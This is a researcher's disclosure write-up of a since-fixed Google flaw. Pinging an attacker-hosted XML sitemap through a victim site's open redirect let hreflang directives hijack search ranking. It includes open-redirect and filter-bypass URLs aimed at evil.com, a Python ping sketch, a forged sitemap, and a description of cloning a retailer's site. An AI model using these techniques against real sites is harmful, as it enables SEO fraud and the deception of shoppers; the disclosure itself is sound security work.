
Google exploit via XML Sitemaps to manipulate search results

Short version:

For the $12 cost of a domain, I was able to rank in Google search results against Amazon, Walmart etc. for high-value money terms in the US. The AdWords bid price for some of these terms is currently around $1 per click, and companies are spending tens of thousands of dollars a month to appear as ads on these search results, while I was appearing for free.

Google have now fixed the issue and awarded a bug bounty of $5000.

Google provides an open URL where you can ‘ping’ an XML sitemap, which they will fetch and parse – this file can contain indexation directives. I discovered that, for many sites, it is possible to ping a sitemap that you (the attacker) are hosting in such a way that Google will trust the evil sitemap as belonging to the victim site.

I believe this is the first time they have awarded a bounty for a security issue in the actual search engine, which directly affects the ranking of sites.

As part of my regular research efforts, I recently reported an issue to Google that allows an attacker to submit an XML sitemap to Google for a site for which they are not authenticated. As these files can contain indexation directives, such as hreflang, an attacker can utilise those directives to help their own sites rank in the Google search results.

I spent $12 setting up my experiment and was ranking on the first page for highly monetizable search terms, with a newly registered domain that had no inbound links.

XML Sitemap & Ping Mechanism

Google allows for the submission of an XML sitemap; these can help them discover URLs to crawl, but can also carry hreflang directives, which Google uses to understand what other international versions of the same page may exist (i.e. “hey Google, this is the US page, but I have a German page on this URL…”). It is not known exactly how Google uses these directives (as with anything related to Google’s search algorithms), but it appears that hreflang allows one URL to ‘borrow’ the link equity and trust of another URL (i.e. most people link to the US .com version, and so the German version can ‘borrow’ that equity to rank better in Google.de).
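As a sketch of what this looks like in practice (example.com / example.de are placeholders, using the xhtml:link annotation syntax from Google’s documentation):

    <?xml version="1.0" encoding="UTF-8"?>
    <urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"
            xmlns:xhtml="http://www.w3.org/1999/xhtml">
      <url>
        <!-- the US page, with annotations declaring its international equivalents -->
        <loc>https://example.com/page.html</loc>
        <xhtml:link rel="alternate" hreflang="en-us" href="https://example.com/page.html"/>
        <xhtml:link rel="alternate" hreflang="de" href="https://example.de/page.html"/>
      </url>
    </urlset>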

You can submit XML sitemaps for your domain either via Google Search Console, inside your robots.txt, or via a special ‘ping’ URL. Google’s own docs seem somewhat contradictory; at the top of the page they refer to submitting sitemaps via the ping mechanism, but at the bottom of the page they have this warning:
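For reference, the latter two mechanisms look roughly like this (example.com being a placeholder):

    # inside https://example.com/robots.txt
    Sitemap: https://example.com/sitemap.xml

    # the ‘ping’ mechanism – a plain, unauthenticated GET request
    https://www.google.com/ping?sitemap=https%3A%2F%2Fexample.com%2Fsitemap.xml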

However, in my experience you could absolutely submit new XML sitemaps via the ping mechanism, with Googlebot typically fetching the file within 10-15 seconds of the ping. Importantly, Google also mention a couple of times on the page that if you submit a sitemap via the ping mechanism it will not show up inside your Search Console:

As a related test, I checked whether I could add other known search directives (noindex, rel-canonical) via XML sitemaps (as well as trying a bunch of XML exploits), but Google didn’t seem to honour them.

Google Search Console Submission

If you try to submit an XML sitemap in GSC that includes URLs for another domain you are not authorised for, then GSC rejects it:

We’ll come back to this in a moment.

(Sorry, Jono!)

Open Redirects

Many sites use a URL parameter to control a redirect:
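Something like this, where victim.com and the parameter name are illustrative:

    https://victim.com/login?returnurl=page.html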

In this example I would be redirected (after login) to page.html. Some sites with poor hygiene allow what are known as ‘open redirects’, where these parameters can redirect to a different domain:
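For example (with evil.com standing in for an attacker-controlled domain):

    https://victim.com/login?returnurl=https://evil.com/page.html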

Often these don’t need any interaction (like a login), so they just redirect the user right away:
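A hypothetical example:

    https://victim.com/redirect?url=https://evil.com/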

Open redirects are very common, and are often considered not too dangerous; Google does not include them in their bug bounty program for this reason. However, companies do try to protect against them where possible, but often you can circumvent that protection:
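For example, a filter checking that the destination starts with, or contains, the site’s own domain might be fooled by hypothetical URLs such as:

    https://victim.com/redirect?url=https://victim.com.evil.com/
    https://victim.com/redirect?url=https://evil.com/victim.com/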

Tesco are a UK retailer doing more than £50 billion in revenue, over £1 billion of which comes via their website. I reported the example I found to Tesco (along with a number of similar issues I discovered at other companies during this research) and they have since fixed it.

Ping Sitemaps via Open Redirects 😱

At this point, you may have guessed where I’m going with this. It turns out that when you ping an XML sitemap, if the URL you submit is a redirect, Google will follow that redirect, even if it is cross-domain. Importantly, Google seems to still associate that XML sitemap with the domain that did the redirect, and to treat the sitemap it finds after the redirect as authorised for that domain. For example:
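    https://www.google.com/ping?sitemap=https://green.com/redirect?url=https://blue.com/evil.xml

(The redirect endpoint and parameter name on green.com are illustrative, and in practice the nested sitemap URL would be URL-encoded.)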

In this case, the evil.xml sitemap is hosted on blue.com, but Google associates it as belonging to, and being authoritative for, green.com. Using this you can submit XML sitemaps for sites you shouldn’t have control of, and send Google search directives.
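A minimal sketch of constructing such a ping, assuming an open redirect at green.com with a returnurl parameter (all domains and the parameter name are placeholders):

    # Python sketch: ping Google with a sitemap URL that redirects cross-domain
    from urllib.parse import quote
    import urllib.request

    sitemap = "https://blue.com/evil.xml"  # attacker-hosted sitemap
    redirect = "https://green.com/login?returnurl=" + quote(sitemap, safe="")
    ping = "https://www.google.com/ping?sitemap=" + quote(redirect, safe="")

    # Googlebot fetches the green.com URL, follows the redirect to blue.com,
    # and treats the sitemap it finds there as authorised for green.com
    urllib.request.urlopen(ping)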

Experiment: Using hreflang directive to ‘steal’ equity and rank for free

At this point I had the various moving parts, but I hadn’t confirmed that Google would really trust a cross-domain redirected XML sitemap, so I spun up an experiment to test it. I had done lots of smaller tests to understand various parts of this (as well as various dead ends), but didn’t expect this experiment to work as well as it did.

I created a fake domain for a UK-based retail company that doesn’t operate in the USA, and spun up an AWS server that mimicked the site (primarily by harvesting the legit content and retooling it – i.e. changing currency / addresses etc.). I have anonymised the company (and industry) here to protect them, so let’s just call them victim.com.

Next, I created a fake sitemap that was hosted on evil.com, but contained only URLs for victim.com. For each URL, the sitemap contained an hreflang entry pointing to the equivalent URL on evil.com, indicating it was the US version of victim.com. I then submitted this sitemap via an open redirect URL on victim.com using Google’s ping mechanism.
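Reconstructed for illustration (with the domains anonymised as above), the evil sitemap looked along these lines:

    <?xml version="1.0" encoding="UTF-8"?>
    <urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"
            xmlns:xhtml="http://www.w3.org/1999/xhtml">
      <!-- hosted on evil.com, but listing only victim.com URLs -->
      <url>
        <loc>https://victim.com/some-product.html</loc>
        <xhtml:link rel="alternate" hreflang="en-gb" href="https://victim.com/some-product.html"/>
        <!-- claims the attacker’s mirrored page is the US version -->
        <xhtml:link rel="alternate" hreflang="en-us" href="https://evil.com/some-product.html"/>
      </url>
      <!-- ...one <url> entry per harvested page... -->
    </urlset>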

Within 48 hours the site started getting small amounts of traffic for long-tail terms (SEMrush screenshot):

A couple more days passed and I started appearing for competitive terms on the first page, against the likes of Amazon & Walmart:

Furthermore, Google Search Console for evil.com indicated that victim.com was linking to evil.com, although this obviously was not the case:

At this point I found I was also able to submit XML sitemaps for victim.com inside GSC for evil.com:

It seemed that Google had linked the sites, and evil.com’s Search Console now had some capability to influence victim.com’s setup. I could now also track indexation for my submitted sitemaps (by this point I had thousands of pages indexed).

Searchmetrics was showing the increasing value of the traffic:

Google Search Console was showing over a million search impressions and over 10,000 clicks from Google search, and at this point I had done nothing other than submit the XML sitemap!

You should note that I was not letting people check out on the evil site, but had I wanted to, at this point I could have scammed people for a lot of money, set up ads, or otherwise begun monetising this traffic. In my mind this posed a serious risk to Google visitors, as well as a risk to companies relying on Google search for traffic. Traffic was still growing, but I shut my experiment down and aborted my follow-up experiments for fear of doing damage.

Discussion

This method is entirely undetectable by victim.com – the XML sitemaps don’t show up on their end, and if you are doing what I did and leveraging their link equity for a different country, then you could fly entirely under the radar. Competitors in the country you are operating in would be left quite baffled by the performance of your site (see above, where I’m in the search results alongside Amazon, Walmart & Target, who are all spending significant resources to be there).

In terms of Black Hat SEO, this has a clear use, and furthermore it is the first example I’m aware of where the algorithm itself is exploited outright, rather than ranking factors simply being manipulated. The potential financial impact of the issue seems non-trivial – imagine the potential profit from targeting Tesco or similar (I had more tests planned to investigate this further, but couldn’t run them without potentially causing damage).

Google have awarded a $5000 bounty for this, and the Google team were a pleasure to deal with, as always. Thanks to them.

If you have any questions, comments or information, you can contact me at [email protected], on Twitter at @TomAnthonySEO, or via Distilled.

Disclosure Timeline

  • 23rd September 2017 – I filed the initial bug report.
  • 25th September 2017 – Google responded – they had triaged the bug and were looking into it.
  • 2nd October 2017 – I sent some more details.
  • 9th October – 6th November 2017 – some back-and-forth status updates.
  • 6th November 2017 – Google said “This report has been somewhat hard to determine on what can be done to prevent this kind of behavior and the amount of it’s impact on our search results. I have reached out to team to get a final decision on your report. I know they have been sifting through the data to determine how prevalent the behavior that you described is and whether this is anything immediately that should be done about it.”
  • 6th November 2017 – I replied suggesting they don’t follow cross-domain redirects for pinged sitemaps – there is little good reason for it, and it could be a GSC only feature.
  • 3rd January 2018 – I asked for a status update.
  • 15th January 2018 – Google replied “Apologies for the delay, I didn’t want to close this report earlier, because we were unable to get a definitive decision, if it would be possible to address this behavior with the redirect chain without breaking many legitimate use cases. I have reached back out to the team reviewing this report to get a final answer and will update you with their response this week.”
  • 15th February 2018 – Google updated to let me know a bug had been filed on the report, and the VRP board would discuss a bounty.
  • 6th March 2018 – Google let me know they had awarded a bounty of $1337.
  • 6th March 2018 – I shared a draft of this post with Google and asked for green light to disclose.
  • 12th March 2018 – Google let me know they hadn’t completed the fix, and asked me to hold off.
  • 25th March 2018 – Google confirmed the fix was live, and gave me green light to post.
  • 17th April 2018 – Google contacted me again to say they had upgraded the bounty amount to $5000. 🙂


